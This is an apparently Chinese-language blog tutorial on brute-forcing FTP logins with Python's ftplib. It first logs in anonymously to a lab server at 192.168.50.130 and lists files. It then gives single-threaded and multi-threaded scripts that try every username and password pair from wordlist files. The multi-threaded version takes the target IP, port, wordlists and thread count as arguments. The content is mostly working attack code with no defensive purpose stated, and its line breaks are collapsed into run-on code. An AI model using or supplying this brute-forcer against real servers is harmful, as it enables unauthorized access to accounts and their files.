python ftplib模块爆破ftp登录用户名和密码

article/2024/12/22 1:18:42

1.连接ftp服务器

import ftplib
ftp = ftplib.FTP()
ftp.connect('192.168.50.130', 21)
ftp.login("anonymous","")    #用户为匿名，密码为空
list = ftp.retrlines('list')     #此时可以获得当前ftp目录下的所有文件的信息
print(list)

运行结果：
在这里插入图片描述

2.ftp登录用户名和密码单线程爆破

import ftplib
ftp = ftplib.FTP()
for username in open('ftp_user.txt'):for password in open('ftp_pwd.txt'):username = username.replace('\n','')password = password.replace('\n','')# print(username+'|'+password)try:ftp.connect('192.168.50.130', 21)ftp.login(username,password)print(username+'|'+password+'| ok')list = ftp.retrlines('list')     #此时可以获得当前ftp目录下的所有文件的信息print(list)except ftplib.all_errors:print("error")

ftp_pwd.txt:
在这里插入图片描述
ftp_user.txt:

运行结果：

3.多线程爆破

ftp服务器设置的最多8个线程

import ftplib,sys,queue,threading
def ftp_brute(ip,port):ftp = ftplib.FTP()ftp.connect(ip,port)while not q.empty():dict = q.get()dict = dict.split('|')username = dict[0]password = dict[1]try:ftp.login(username,password)print(username+'|'+password+'| ok')list = ftp.retrlines('list')     #此时可以获得当前ftp目录下的所有文件的信息print(list)except ftplib.all_errors:print(username + '|' + password + '| no')pass
if __name__ == '__main__':ip = sys.argv[1]port = int(sys.argv[2])userfile = sys.argv[3]passfile = sys.argv[4]threading_num = int(sys.argv[5])q = queue.Queue()for username in open(userfile):for password in open(passfile):username = username.replace('\n','')password = password.replace('\n','')# print(username+'|'+password)q.put(username + '|' + password)for x in range(threading_num):t = threading.Thread(target=ftp_brute,args=(ip,port))t.start()